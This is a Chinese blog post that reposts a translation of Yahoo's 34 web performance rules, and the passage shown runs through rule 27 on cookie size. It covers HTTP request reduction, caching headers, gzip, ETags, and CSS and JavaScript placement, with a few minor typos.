灿烂的阳光,苦涩的生活,认真做,你能行!

发布新日志

  • Yahoo!网站性能最佳体验的34条黄金守则

    2009-04-14 16:09:06

    Yahoo!网站性能最佳体验的34条黄金守则

    转载自:http://www.dudo.org/article.asp?id=214

    英文地址:http://developer.yahoo.com/performance/rules.html
    中文地址:http://www.dudo.org/article.asp?id=214
          Yahoo!的Exceptional Performance团队为改善Web性能带来最佳实践。他们为此进行了一系列的实验、开发了各种工具、写了大量的文章和博客并在各种会议上参与探讨。最佳实践的核心就是旨在提高网站性能。
    Excetional Performance团队总结出了一系列可以提高网站速度的方法。可以分为7大类34条。包括内容、服务器、cookie、CSS、JavaScript、图片、移动应用等七部分。

    其中内容部分一共十条建议:

    一、内容部分

    1. 尽量减少HTTP请求
    2. 减少DNS查找
    3. 避免跳转
    4. 缓存Ajxa
    5. 推迟加载
    6. 提前加载
    7. 减少DOM元素数量
    8. 用域名划分页面内容
    9. 使frame数量最少
    10. 避免404错误


    1、尽量减少HTTP请求次数
          终端用户响应的时间中,有80%用于下载各项内容。这部分时间包括下载页面中的图像、样式表、脚本、Flash等。通过减少页面中的元素可以减少HTTP请求的次数。这是提高网页速度的关键步骤。
          减少页面组件的方法其实就是简化页面设计。那么有没有一种方法既能保持页面内容的丰富性又能达到加快响应时间的目的呢?这里有几条减少HTTP请求次数同时又可能保持页面内容丰富的技术。

    合并文件是通过把所有的脚本放到一个文件中来减少HTTP请求的方法,如可以简单地把所有的CSS文件都放入一个样式表中。当脚本或者样式表在不同页面中使用时需要做不同的修改,这可能会相对麻烦点,但即便如此也要把这个方法作为改善页面性能的重要一步。

    CSS Sprites是减少图像请求的有效方法。把所有的背景图像都放到一个图片文件中,然后通过CSS的background-imagebackground-position属性来显示图片的不同部分;

    图片地图是把多张图片整合到一张图片中。虽然文件的总体大小不会改变,但是可以减少HTTP请求次数。图片地图只有在图片的所有组成部分在页面中是紧挨在一起的时候才能使用,如导航栏。确定图片的坐标和可能会比较繁琐且容易出错,同时使用图片地图导航也不具有可读性,因此不推荐这种方法;

    内联图像是使用data:URL scheme的方法把图像数据加载页面中。这可能会增加页面的大小。把内联图像放到样式表(可缓存)中可以减少HTTP请求同时又避免增加页面文件的大小。但是内联图像现在还没有得到主流浏览器的支持。

         减少页面的HTTP请求次数是你首先要做的一步。这是改进首次访问用户等待时间的最重要的方法。如同Tenni Theurer的他的博客Browser Cahe Usage - Exposed!中所说,HTTP请求在无缓存情况下占去了40%到60%的响应时间。让那些初次访问你网站的人获得更加快速的体验吧!

    2、减少DNS查找次数

            域名系统(DNS)提供了域名和IP的对应关系,就像电话本中人名和他们的电话号码的关系一样。当你在浏览器地址栏中输入http://www.dudo.org/时,DNS解析服务器就会返回这个域名对应的IP地址。DNS解析的过程同样也是需要时间的。一般情况下返回给定域名对应的IP地址会花费20到120毫秒的时间。而且在这个过程中浏览器什么都不会做直到DNS查找完毕。

           缓存DNS查找可以改善页面性能。这种缓存需要一个特定的缓存服务器,这种服务器一般属于用户的ISP提供商或者本地局域网控制,但是它同样会在用户使用的计算机上产生缓存。DNS信息会保留在操作系统的DNS缓存中(微软Windows系统中DNS Client Service)。大多数浏览器有独立于操作系统以外的自己的缓存。由于浏览器有自己的缓存记录,因此在一次请求中它不会受到操作系统的影响。

          Internet Explorer默认情况下对DNS查找记录的缓存时间为30分钟,它在注册表中的键值为DnsCacheTimeout。Firefox对DNS的查找记录缓存时间为1分钟,它在配置文件中的选项为network.dnsCacheExpiration(Fasterfox把这个选项改为了1小时)。

          当客户端中的DNS缓存都为空时(浏览器和操作系统都为空),DNS查找的次数和页面中主机名的数量相同。这其中包括页面中URL、图片、脚本文件、样式表、Flash对象等包含的主机名。减少主机名的数量可以减少DNS查找次数。

          减少主机名的数量还可以减少页面中并行下载的数量。减少DNS查找次数可以节省响应时间,但是减少并行下载却会增加响应时间。我的指导原则是把这些页面中的内容分割成至少两部分但不超过四部分。这种结果就是在减少DNS查找次数和保持较高程度并行下载两者之间的权衡了。

    3、避免跳转
    跳转是使用301和302代码实现的。下面是一个响应代码为301的HTTP头:
          HTTP/1.1 301 Moved Permanently
          Location: http://example.com/newuri
          Content-Type: text/html
          浏览器会把用户指向到Location中指定的URL。头文件中的所有信息在一次跳转中都是必需的,内容部分可以为空。不管他们的名称,301和302响应都不会被缓存除非增加一个额外的头选项,如Expires或者Cache-Control来指定它缓存。<meat />元素的刷新标签和JavaScript也可以实现URL的跳转,但是如果你必须要跳转的时候,最好的方法就是使用标准的3XXHTTP状态代码,这主要是为了确保“后退”按钮可以正确地使用。

          但是要记住跳转会降低用户体验。在用户和HTML文档中间增加一个跳转,会拖延页面中所有元素的显示,因为在HTML文件被加载前任何文件(图像、Flash等)都不会被下载。

          有一种经常被网页开发者忽略却往往十分浪费响应时间的跳转现象。这种现象发生在当URL本该有斜杠(/)却被忽略掉时。例如,当我们要访问http://astrology.yahoo.com/astrology 时,实际上返回的是一个包含301代码的跳转,它指向的是http://astrology.yahoo.com/astrology/  (注意末尾的斜杠)。在Apache服务器中可以使用Alias 或者 mod_rewrite或者the DirectorySlash来避免。

          连接新网站和旧网站是跳转功能经常被用到的另一种情况。这种情况下往往要连接网站的不同内容然后根据用户的不同类型(如浏览器类型、用户账号所属类型)来进行跳转。使用跳转来实现两个网站的切换十分简单,需要的代码量也不多。尽管使用这种方法对于开发者来说可以降低复杂程度,但是它同样降低用户体验。一个可替代方法就是如果两者在同一台服务器上时使用Alias和mod_rewrite和实现。如果是因为域名的不同而采用跳转,那么可以通过使用Alias或者mod_rewirte建立CNAME(保存一个域名和另外一个域名之间关系的DNS记录)来替代。

    4、可缓存的AJAX
          Ajax经常被提及的一个好处就是由于其从后台服务器传输信息的异步性而为用户带来的反馈的即时性。但是,使用Ajax并不能保证用户不会在等待异步的JavaScript和XML响应上花费时间。在很多应用中,用户是否需要等待响应取决于Ajax如何来使用。例如,在一个基于Web的Email客户端中,用户必须等待Ajax返回符合他们条件的邮件查询结果。记住一点,“异步”并不异味着“即时”,这很重要。

          为了提高性能,优化Ajax响应是很重要的。提高Ajxa性能的措施中最重要的方法就是使响应具有可缓存性,具体的讨论可以查看Add an Expires or a Cache-Control Header。其它的几条规则也同样适用于Ajax:
        Gizp压缩文件
        减少DNS查找次数
        精简JavaScript
        避免跳转
        配置ETags

         让我们来看一个例子:一个Web2.0的Email客户端会使用Ajax来自动完成对用户地址薄的下载。如果用户在上次使用过Email web应用程序后没有对地址薄作任何的修改,而且Ajax响应通过Expire或者Cacke-Control头来实现缓存,那么就可以直接从上一次的缓存中读取地址薄了。必须告知浏览器是使用缓存中的地址薄还是发送一个新的请求。这可以通过为读取地址薄的Ajax URL增加一个含有上次编辑时间的时间戳来实现,例如,&t=11900241612等。如果地址薄在上次下载后没有被编辑过,时间戳就不变,则从浏览器的缓存中加载从而减少了一次HTTP请求过程。如果用户修改过地址薄,时间戳就会用来确定新的URL和缓存响应并不匹配,浏览器就会重要请求更新地址薄。
            即使你的Ajxa响应是动态生成的,哪怕它只适用于一个用户,那么它也应该被缓存起来。这样做可以使你的Web2.0应用程序更加快捷。

    5、推迟加载内容
            你可以仔细看一下你的网页,问问自己“哪些内容是页面呈现时所必需首先加载的?哪些内容和结构可以稍后再加载?
            把整个过程按照onload事件分隔成两部分,JavaScript是一个理想的选择。例如,如果你有用于实现拖放和动画的JavaScript,那么它就以等待稍后加载,因为页面上的拖放元素是在初始化呈现之后才发生的。其它的例如隐藏部分的内容(用户操作之后才显现的内容)和处于折叠部分的图像也可以推迟加载
            工具可以节省你的工作量:YUI Image Loader可以帮你推迟加载折叠部分的图片,YUI Get utility是包含JS和 CSS的便捷方法。比如你可以打开Firebug的Net选项卡看一下Yahoo的首页。
            当性能目标和其它网站开发实践一致时就会相得益彰。这种情况下,通过程序提高网站性能的方法告诉我们,在支持JavaScript的情况下,可以先去除用户体验,不过这要保证你的网站在没有JavaScript也可以正常运行。在确定页面运行正常后,再加载脚本来实现如拖放和动画等更加花哨的效果。

    6、预加载
            预加载和后加载看起来似乎恰恰相反,但实际上预加载是为了实现另外一种目标。预加载是在浏览器空闲时请求将来可能会用到的页面内容(如图像、样式表和脚本)。使用这种方法,当用户要访问下一个页面时,页面中的内容大部分已经加载到缓存中了,因此可以大大改善访问速度。

    下面提供了几种预加载方法:
    无条件加载:触发onload事件时,直接加载额外的页面内容。以Google.com为例,你可以看一下它的spirit image图像是怎样在onload中加载的。这个spirit image图像在google.com主页中是不需要的,但是却可以在搜索结果页面中用到它。
    有条件加载:根据用户的操作来有根据地判断用户下面可能去往的页面并相应的预加载页面内容。在search.yahoo.com中你可以看到如何在你输入内容时加载额外的页面内容。
    有预期的加载:载入重新设计过的页面时使用预加载。这种情况经常出现在页面经过重新设计后用户抱怨“新的页面看起来很酷,但是却比以前慢”。问题可能出在用户对于你的旧站点建立了完整的缓存,而对于新站点却没有任何缓存内容。因此你可以在访问新站之前就加载一部内容来避免这种结果的出现。在你的旧站中利用浏览器的空余时间加载新站中用到的图像的和脚本来提高访问速度。

    7、减少DOM元素数量
            一个复杂的页面意味着需要下载更多数据,同时也意味着JavaScript遍历DOM的效率越慢。比如当你增加一个事件句柄时在500和5000个DOM元素中循环效果肯定是不一样的。
           大量的DOM元素的存在意味着页面中有可以不用移除内容只需要替换元素标签就可以精简的部分。你在页面布局中使用表格了吗?你有没有仅仅为了布局而引入更多的<div>元素呢?也许会存在一个适合或者在语意是更贴切的标签可以供你使用。
            YUI CSS utilities可以给你的布局带来巨大帮助:grids.css可以帮你实现整体布局,font.css和reset.css可以帮助你移除浏览器默认格式。它提供了一个重新审视你页面中标签的机会,比如只有在语意上有意义时才使用<div>,而不是因为它具有换行效果才使用它。
          DOM元素数量很容易计算出来,只需要在Firebug的控制台内输入:
    document.getElementsByTagName('*').length
            那么多少个DOM元素算是多呢?这可以对照有很好标记使用的类似页面。比如Yahoo!主页是一个内容非常多的页面,但是它只使用了700个元素(HTML标签)。

    8、根据域名划分页面内容
          把页面内容划分成若干部分可以使你最大限度地实现平行下载。由于DNS查找带来的影响你首先要确保你使用的域名数量在2个到4个之间。例如,你可以把用到的HTML内容和动态内容放在www.example.org上,而把页面各种组件(图片、脚本、CSS)分别存放在statics1.example.org和statics.example.org上。
    你可在Tenni Theurer和Patty Chi合写的文章Maximizing Parallel Downloads in the Carpool Lane找到更多相关信息。

    9、使iframe的数量最小
          ifrmae元素可以在父文档中插入一个新的HTML文档。了解iframe的工作理然后才能更加有效地使用它,这一点很重要。
    <iframe>优点:

    • 解决加载缓慢的第三方内容如图标和广告等的加载问题
    • Security sandbox
    • 并行加载脚本

    <iframe>的缺点:

    • 即时内容为空,加载也需要时间
    • 会阻止页面加载
    • 没有语意


    10、不要出现404错误
          HTTP请求时间消耗是很大的,因此使用HTTP请求来获得一个没有用处的响应(例如404没有找到页面)是完全没有必要的,它只会降低用户体验而不会有一点好处。
          有些站点把404错误响应页面改为“你是不是要找***”,这虽然改进了用户体验但是同样也会浪费服务器资源(如数据库等)。最糟糕的情况是指向外部JavaScript的链接出现问题并返回404代码。首先,这种加载会破坏并行加载;其次浏览器会把试图在返回的404响应内容中找到可能有用的部分当作JavaScript代码来执行。

     

    转载自:http://www.dudo.org/article.asp?id=215

      在本系列的第一节中,讲了提高网站性能中网站“内容”有关的10条原则。除了在网站在内容上的改进外,在网站服务器端上也有需要注意和改进的地方,它们包括:

    1. 使用内容分发网络
    2. 为文件头指定Expires或Cache-Control
    3. Gzip压缩文件内容
    4. 配置ETag
    5. 尽早刷新输出缓冲
    6. 使用GET来完成AJAX请求


    11、使用内容分发网络

          用户与你网站服务器的接近程度会影响响应时间的长短。把你的网站内容分散到多个、处于不同地域位置的服务器上可以加快下载速度。但是首先我们应该做些什么呢?
          按地域布置网站内容的第一步并不是要尝试重新架构你的网站让他们在分发服务器上正常运行。根据应用的需求来改变网站结构,这可能会包括一些比较复杂的任务,如在服务器间同步Session状态和合并数据库更新等。要想缩短用户和内容服务器的距离,这些架构步骤可能是不可避免的。
          要记住,在终端用户的响应时间中有80%到90%的响应时间用于下载图像、样式表、脚本、Flash等页面内容。这就是网站性能黄金守则。和重新设计你的应用程序架构这样比较困难的任务相比,首先来分布静态内容会更好一点。这不仅会缩短响应时间,而且对于内容分发网络来说它更容易实现。
          内容分发网络(Content Delivery Network,CDN)是由一系列分散到各个不同地理位置上的Web服务器组成的,它提高了网站内容的传输速度。用于向用户传输内容的服务器主要是根据和用户在网络上的靠近程度来指定的。例如,拥有最少网络跳数(network hops)和响应速度最快的服务器会被选定。
          一些大型的网络公司拥有自己的CDN,但是使用像Akamai TechnologiesMirror Image Internet, 或者Limelight Networks这样的CDN服务成本却非常高。对于刚刚起步的企业和个人网站来说,可能没有使用CDN的成本预算,但是随着目标用户群的不断扩大和更加全球化,CDN就是实现快速响应所必需的了。以Yahoo来说,他们转移到CDN上的网站程序静态内容节省了终端用户20%以上的响应时间。使用CDN是一个只需要相对简单地修改代码实现显著改善网站访问速度的方法。

    12、为文件头指定Expires或Cache-Control
          这条守则包括两方面的内容:
    对于静态内容:设置文件头过期时间Expires的值为“Never expire”(永不过期)
    对于动态内容:使用恰当的Cache-Control文件头来帮助浏览器进行有条件的请求
          网页内容设计现在越来越丰富,这就意味着页面中要包含更多的脚本、样式表、图片和Flash。第一次访问你页面的用户就意味着进行多次的HTTP请求,但是通过使用Expires文件头就可以使这样内容具有缓存性。它避免了接下来的页面访问中不必要的HTTP请求。Expires文件头经常用于图像文件,但是应该在所有的内容都使用他,包括脚本、样式表和Flash等。
          浏览器(和代理)使用缓存来减少HTTP请求的大小和次数以加快页面访问速度。Web服务器在HTTP响应中使用Expires文件头来告诉客户端内容需要缓存多长时间。下面这个例子是一个较长时间的Expires文件头,它告诉浏览器这个响应直到2010年4月15日才过期。
          Expires: Thu, 15 Apr 2010 20:00:00 GMT
          如果你使用的是Apache服务器,可以使用ExpiresDefault来设定相对当前日期的过期时间。下面这个例子是使用ExpiresDefault来设定请求时间后10年过期的文件头:
          ExpiresDefault "access plus 10 years"
          要切记,如果使用了Expires文件头,当页面内容改变时就必须改变内容的文件名。依Yahoo!来说我们经常使用这样的步骤:在内容的文件名中加上版本号,如yahoo_2.0.6.js。
          使用Expires文件头只有会在用户已经访问过你的网站后才会起作用。当用户首次访问你的网站时这对减少HTTP请求次数来说是无效的,因为浏览器的缓存是空的。因此这种方法对于你网站性能的改进情况要依据他们“预缓存”存在时对你页面的点击频率(“预缓存”中已经包含了页面中的所有内容)。Yahoo!建立了一套测量方法,我们发现所有的页面浏览量中有75~85%都有“预缓存”。通过使用Expires文件头,增加了缓存在浏览器中内容的数量,并且可以在用户接下来的请求中再次使用这些内容,这甚至都不需要通过用户发送一个字节的请求。

    13、Gzip压缩文件内容
          网络传输中的HTTP请求和应答时间可以通过前端机制得到显著改善。的确,终端用户的带宽、互联网提供者、与对等交换点的靠近程度等都不是网站开发者所能决定的。但是还有其他因素影响着响应时间。通过减小HTTP响应的大小可以节省HTTP响应时间。
          从HTTP/1.1开始,web客户端都默认支持HTTP请求中有Accept-Encoding文件头的压缩格式:   
          Accept-Encoding: gzip, deflate
          如果web服务器在请求的文件头中检测到上面的代码,就会以客户端列出的方式压缩响应内容。Web服务器把压缩方式通过响应文件头中的Content-Encoding来返回给浏览器。
          Content-Encoding: gzip
          Gzip是目前最流行也是最有效的压缩方式。这是由GNU项目开发并通过RFC 1952来标准化的。另外仅有的一个压缩格式是deflate,但是它的使用范围有限效果也稍稍逊色。
          Gzip大概可以减少70%的响应规模。目前大约有90%通过浏览器传输的互联网交换支持gzip格式。如果你使用的是Apache,gzip模块配置和你的版本有关:Apache 1.3使用mod_zip,而Apache 2.x使用moflate
          浏览器和代理都会存在这样的问题:浏览器期望收到的和实际接收到的内容会存在不匹配的现象。幸好,这种特殊情况随着旧式浏览器使用量的减少在减少。Apache模块会通过自动添加适当的Vary响应文件头来避免这种状况的出现。
          服务器根据文件类型来选择需要进行gzip压缩的文件,但是这过于限制了可压缩的文件。大多数web服务器会压缩HTML文档。对脚本和样式表进行压缩同样也是值得做的事情,但是很多web服务器都没有这个功能。实际上,压缩任何一个文本类型的响应,包括XML和JSON,都值得的。图像和PDF文件由于已经压缩过了所以不能再进行gzip压缩。如果试图gizp压缩这些文件的话不但会浪费CPU资源还会增加文件的大小。
          Gzip压缩所有可能的文件类型是减少文件体积增加用户体验的简单方法。

    14、配置ETag
          Entity tags(ETags)(实体标签)是web服务器和浏览器用于判断浏览器缓存中的内容和服务器中的原始内容是否匹配的一种机制(“实体”就是所说的“内容”,包括图片、脚本、样式表等)。增加ETag为实体的验证提供了一个比使用“last-modified date(上次编辑时间)”更加灵活的机制。Etag是一个识别内容版本号的唯一字符串。唯一的格式限制就是它必须包含在双引号内。原始服务器通过含有ETag文件头的响应指定页面内容的ETag。
          HTTP/1.1 200 OK
          Last-Modified: Tue, 12 Dec 2006 03:03:59 GMT
          ETag: "10c24bc-4ab-457e1c1f"
          Content-Length: 12195
          稍后,如果浏览器要验证一个文件,它会使用If-None-Match文件头来把ETag传回给原始服务器。在这个例子中,如果ETag匹配,就会返回一个304状态码,这就节省了12195字节的响应。      GET /i/yahoo.gif HTTP/1.1
          Host: us.yimg.com
          If-Modified-Since: Tue, 12 Dec 2006 03:03:59 GMT
          If-None-Match: "10c24bc-4ab-457e1c1f"
          HTTP/1.1 304 Not Modified
          ETag的问题在于,它是根据可以辨别网站所在的服务器的具有唯一性的属性来生成的。当浏览器从一台服务器上获得页面内容后到另外一台服务器上进行验证时ETag就会不匹配,这种情况对于使用服务器组和处理请求的网站来说是非常常见的。默认情况下,Apache和IIS都会把数据嵌入ETag中,这会显著减少多服务器间的文件验证冲突。
          Apache 1.3和2.x中的ETag格式为inode-size-timestamp。即使某个文件在不同的服务器上会处于相同的目录下,文件大小、权限、时间戳等都完全相同,但是在不同服务器上他们的内码也是不同的。
          IIS 5.0和IIS 6.0处理ETag的机制相似。IIS中的ETag格式为Filetimestamp:ChangeNumber。用ChangeNumber来跟踪IIS配置的改变。网站所用的不同IIS服务器间ChangeNumber也不相同。 不同的服务器上的Apache和IIS即使对于完全相同的内容产生的ETag在也不相同,用户并不会接收到一个小而快的304响应;相反他们会接收一个正常的200响应并下载全部内容。如果你的网站只放在一台服务器上,就不会存在这个问题。但是如果你的网站是架设在多个服务器上,并且使用Apache和IIS产生默认的ETag配置,你的用户获得页面就会相对慢一点,服务器会传输更多的内容,占用更多的带宽,代理也不会有效地缓存你的网站内容。即使你的内容拥有Expires文件头,无论用户什么时候点击“刷新”或者“重载”按钮都会发送相应的GET请求。
          如果你没有使用ETag提供的灵活的验证模式,那么干脆把所有的ETag都去掉会更好。Last-Modified文件头验证是基于内容的时间戳的。去掉ETag文件头会减少响应和下次请求中文件的大小。微软的这篇支持文稿讲述了如何去掉ETag。在Apache中,只需要在配置文件中简单添加下面一行代码就可以了:
          FileETag none

    15、尽早刷新输出缓冲
          当用户请求一个页面时,无论如何都会花费200到500毫秒用于后台组织HTML文件。在这期间,浏览器会一直空闲等待数据返回。在PHP中,你可以使用flush()方法,它允许你把已经编译的好的部分HTML响应文件先发送给浏览器,这时浏览器就会可以下载文件中的内容(脚本等)而后台同时处理剩余的HTML页面。这样做的效果会在后台烦恼或者前台较空闲时更加明显。
          输出缓冲应用最好的一个地方就是紧跟在<head />之后,因为HTML的头部分容易生成而且头部往往包含CSS和JavaScript文件,这样浏览器就可以在后台编译剩余HTML的同时并行下载它们。 例子:

          ... <!-- css, js -->
        </head>
        <?php flush(); ?>
        <body>
          ... <!-- content -->

    为了证明使用这项技术的好处,Yahoo!搜索率先研究并完成了用户测试。

    16、使用GET来完成AJAX请求
          Yahoo!Mail团队发现,当使用XMLHttpRequest时,浏览器中的POST方法是一个“两步走”的过程:首先发送文件头,然后才发送数据。因此使用GET最为恰当,因为它只需发送一个TCP包(除非你有很多cookie)。IE中URL的最大长度为2K,因此如果你要发送一个超过2K的数据时就不能使用GET了。
          一个有趣的不同就是POST并不像GET那样实际发送数据。根据HTTP规范,GET意味着“获取”数据,因此当你仅仅获取数据时使用GET更加有意义(从语意上讲也是如此),相反,发送并在服务端保存数据时使用POST。

     

    转载自:http://www.dudo.org/article.asp?id=216

     在第一部分和第二部分中我们分别介绍了改善网站性能中页面内容服务器的几条守则,除此之外,JavaScript和CSS也是我们页面中经常用到的内容,对它们的优化也提高网站性能的重要方面:
    CSS:

    1. 把样式表置于顶部
    2. 避免使用CSS表达式(Expression)
    3. 使用外部JavaScript和CSS
    4. 削减JavaScript和CSS
    5. http://www.dudo.org/article.asp?id=216#link
    6. 避免使用滤镜

    JavaScript

    1. 把脚本置于页面底部
    2. 使用外部JavaScript和CSS
    3. 削减JavaScript和CSS
    4. 剔除重复脚本
    5. 减少DOM访问
    6. 开发智能事件处理程序


    17、把样式表置于顶部
          在研究Yahoo!的性能表现时,我们发现把样式表放到文档的<head />内部似乎会加快页面的下载速度。这是因为把样式表放到<head />内会使页面有步骤的加载显示。
          注重性能的前端服务器往往希望页面有秩序地加载。同时,我们也希望浏览器把已经接收到内容尽可能显示出来。这对于拥有较多内容的页面和网速较慢的用户来说特别重要。向用户返回可视化的反馈,比如进程指针,已经有了较好的研究并形成了正式文档。在我们的研究中HTML页面就是进程指针。当浏览器有序地加载文件头、导航栏、顶部的logo等对于等待页面加载的用户来说都可以作为可视化的反馈。这从整体上改善了用户体验。
          把样式表放在文档底部的问题是在包括Internet Explorer在内的很多浏览器中这会中止内容的有序呈现。浏览器中止呈现是为了避免样式改变引起的页面元素重绘。用户不得不面对一个空白页面。
          HTML规范清楚指出样式表要放包含在页面的<head />区域内:“和<a />不同,<link />只能出现在文档的<head />区域内,尽管它可以多次使用它”。无论是引起白屏还是出现没有样式化的内容都不值得去尝试。最好的方案就是按照HTML规范在文档<head />内加载你的样式表。

    18、避免使用CSS表达式(Expression)
          CSS表达式是动态设置CSS属性的强大(但危险)方法。Internet Explorer从第5个版本开始支持CSS表达式。下面的例子中,使用CSS表达式可以实现隔一个小时切换一次背景颜色:
          background-color: expression( (new Date()).getHours()%2 ? "#B8D4FF" : "#F08A00" );
    如上所示,expression中使用了JavaScript表达式。CSS属性根据JavaScript表达式的计算结果来设置。expression方法在其它浏览器中不起作用,因此在跨浏览器的设计中单独针对Internet Explorer设置时会比较有用。
          表达式的问题就在于它的计算频率要比我们想象的多。不仅仅是在页面显示和缩放时,就是在页面滚动、乃至移动鼠标时都会要重新计算一次。给CSS表达式增加一个计数器可以跟踪表达式的计算频率。在页面中随便移动鼠标都可以轻松达到10000次以上的计算量。
          一个减少CSS表达式计算次数的方法就是使用一次性的表达式,它在第一次运行时将结果赋给指定的样式属性,并用这个属性来代替CSS表达式。如果样式属性必须在页面周期内动态地改变,使用事件句柄来代替CSS表达式是一个可行办法。如果必须使用CSS表达式,一定要记住它们要计算成千上万次并且可能会对你页面的性能产生影响。

    19、使用外部JavaScript和CSS
          很多性能规则都是关于如何处理外部文件的。但是,在你采取这些措施前你可能会问到一个更基本的问题:JavaScript和CSS是应该放在外部文件中呢还是把它们放在页面本身之内呢?
          在实际应用中使用外部文件可以提高页面速度,因为JavaScript和CSS文件都能在浏览器中产生缓存。内置在HTML文档中的JavaScript和CSS则会在每次请求中随HTML文档重新下载。这虽然减少了HTTP请求的次数,却增加了HTML文档的大小。从另一方面来说,如果外部文件中的JavaScript和CSS被浏览器缓存,在没有增加HTTP请求次数的同时可以减少HTML文档的大小。
          关键问题是,外部JavaScript和CSS文件缓存的频率和请求HTML文档的次数有关。虽然有一定的难度,但是仍然有一些指标可以一测量它。如果一个会话中用户会浏览你网站中的多个页面,并且这些页面中会重复使用相同的脚本和样式表,缓存外部文件就会带来更大的益处。
          许多网站没有功能建立这些指标。对于这些网站来说,最好的坚决方法就是把JavaScript和CSS作为外部文件引用。比较适合使用内置代码的例外就是网站的主页,如Yahoo!主页My Yahoo!。主页在一次会话中拥有较少(可能只有一次)的浏览量,你可以发现内置JavaScript和CSS对于终端用户来说会加快响应时 间。
          对于拥有较大浏览量的首页来说,有一种技术可以平衡内置代码带来的HTTP请求减少与通过使用外部文件进行缓存带来的好处。其中一个就是在首页中内置JavaScript和CSS,但是在页面下载完成后动态下载外部文件,在子页面中使用到这些文件时,它们已经缓存到浏览器了。

    20、削减JavaScript和CSS
          精简是指从去除代码不必要的字符减少文件大小从而节省下载时间。消减代码时,所有的注释、不需要的空白字符(空格、换行、tab缩进)等都要去掉。在JavaScript中,由于需要下载的文件体积变小了从而节省了响应时间。精简JavaScript中目前用到的最广泛的两个工具是JSMinYUI Compressor。YUI Compressor还可用于精简CSS。
          混淆是另外一种可用于源代码优化的方法。这种方法要比精简复杂一些并且在混淆的过程更易产生问题。在对美国前10大网站的调查中发现,精简也可以缩小原来代码体积的21%,而混淆可以达到25%。尽管混淆法可以更好地缩减代码,但是对于JavaScript来说精简的风险更小。
          除消减外部的脚本和样式表文件外,<script>和<style>代码块也可以并且应该进行消减。即使你用Gzip压缩过脚本和样式表,精简这些文件仍然可以节省5%以上的空间。由于JavaScript和CSS的功能和体积的增加,消减代码将会获得益处。

    21、用<link>代替@import
          前面的最佳实现中提到CSS应该放置在顶端以利于有序加载呈现。
          在IE中,页面底部@import和使用<link>作用是一样的,因此最好不要使用它。

    22、避免使用滤镜
          IE独有属性AlphaImageLoader用于修正7.0以下版本中显示PNG图片的半透明效果。这个滤镜的问题在于浏览器加载图片时它会终止内容的呈现并且冻结浏览器。在每一个元素(不仅仅是图片)它都会运算一次,增加了内存开支,因此它的问题是多方面的。
          完全避免使用AlphaImageLoader的最好方法就是使用PNG8格式来代替,这种格式能在IE中很好地工作。如果你确实需要使用AlphaImageLoader,请使用下划线_filter又使之对IE7以上版本的用户无效。

    23、把脚本置于页面底部
          脚本带来的问题就是它阻止了页面的平行下载。HTTP/1.1 规范建议,浏览器每个主机名的并行下载内容不超过两个。如果你的图片放在多个主机名上,你可以在每个并行下载中同时下载2个以上的文件。但是当下载脚本时,浏览器就不会同时下载其它文件了,即便是主机名不相同。
          在某些情况下把脚本移到页面底部可能不太容易。比如说,如果脚本中使用了document.write来插入页面内容,它就不能被往下移动了。这里可能还会有作用域的问题。很多情况下,都会遇到这方面的问题。
          一个经常用到的替代方法就是使用延迟脚本。DEFER属性表明脚本中没有包含document.write,它告诉浏览器继续显示。不幸的是,Firefox并不支持DEFER属性。在Internet Explorer中,脚本可能会被延迟但效果也不会像我们所期望的那样。如果脚本可以被延迟,那么它就可以移到页面的底部。这会让你的页面加载的快一点。

    24、剔除重复脚本
          在同一个页面中重复引用JavaScript文件会影响页面的性能。你可能会认为这种情况并不多见。对于美国前10大网站的调查显示其中有两家存在重复引用脚本的情况。有两种主要因素导致一个脚本被重复引用的奇怪现象发生:团队规模和脚本数量。如果真的存在这种情况,重复脚本会引起不必要的HTTP请求和无用的JavaScript运算,这降低了网站性能。
          在Internet Explorer中会产生不必要的HTTP请求,而在Firefox却不会。在Internet Explorer中,如果一个脚本被引用两次而且它又不可缓存,它就会在页面加载过程中产生两次HTTP请求。即时脚本可以缓存,当用户重载页面时也会产生额外的HTTP请求。
          除增加额外的HTTP请求外,多次运算脚本也会浪费时间。在Internet Explorer和Firefox中不管脚本是否可缓存,它们都存在重复运算JavaScript的问题。
          一个避免偶尔发生的两次引用同一脚本的方法是在模板中使用脚本管理模块引用脚本。在HTML页面中使用<script. />标签引用脚本的最常见方法就是:
          <script. type="text/javascript" src="menu_1.0.17.js"></script>
    在PHP中可以通过创建名为insertScript的方法来替代:
          <?php insertScript("menu.js") ?>
    为了防止多次重复引用脚本,这个方法中还应该使用其它机制来处理脚本,如检查所属目录和为脚本文件名中增加版本号以用于Expire文件头等。

    25、减少DOM访问
          使用JavaScript访问DOM元素比较慢,因此为了获得更多的应该页面,应该做到:

    • 缓存已经访问过的有关元素
    • 线下更新完节点之后再将它们添加到文档树中
    • 避免使用JavaScript来修改页面布局

          有关此方面的更多信息请查看Julien Lecomte在YUI专题中的文章“高性能Ajax应该程序”

    26、开发智能事件处理程序
          有时候我们会感觉到页面反应迟钝,这是因为DOM树元素中附加了过多的事件句柄并且些事件句病被频繁地触发。这就是为什么说使用event delegation(事件代理)是一种好方法了。如果你在一个div中有10个按钮,你只需要在div上附加一次事件句柄就可以了,而不用去为每一个按钮增加一个句柄。事件冒泡时你可以捕捉到事件并判断出是哪个事件发出的。
          你同样也不用为了操作DOM树而等待onload事件的发生。你需要做的就是等待树结构中你要访问的元素出现。你也不用等待所有图像都加载完毕。
          你可能会希望用DOMContentLoaded事件来代替onload,但是在所有浏览器都支持它之前你可使用YUI 事件应用程序中的onAvailable方法。
          有关此方面的更多信息请查看Julien Lecomte在YUI专题中的文章“高性能Ajax应该程序”

     

    转载自:http://www.dudo.org/article.asp?id=218

    我们在前面的几节中分别讲了提高网站性能中内容服务器JavaScript和CSS等方面的内容。除此之外,图片和Coockie也是我们网站中几乎不可缺少组成部分,此外随着移动设备的流行,对于移动应用的优化也十分重要。这主要包括:
    Coockie:

    1. 减小Cookie体积
    2. 对于页面内容使用无coockie域名

    图片:

    1. 优化图像
    2. 优化CSS Spirite
    3. 不要在HTML中缩放图像
    4. favicon.ico要小而且可缓存

    移动应用:

    1. 保持单个内容小于25K
    2. 打包组件成复合文本


    27、减小Cookie体积

          HTTP coockie可以用于权限验证和个性化身份等多种用途。coockie内的有关信息是通过HTTP文件头来在web服务器和浏览器之间进行交流的。因此保持coockie尽可能的小以减少用户的响应时间十分重要。
    有关更多信息可以查看Tenni Theurer和Patty Chi的文章“When the Cookie Crumbles”。这们研究中主要包括:

    • 去除不必要的coockie
    • 使coockie体积尽量小以减少对用户响应的影响
    • 注意在适应级别的域名上设置coockie以便使子域名不受影响
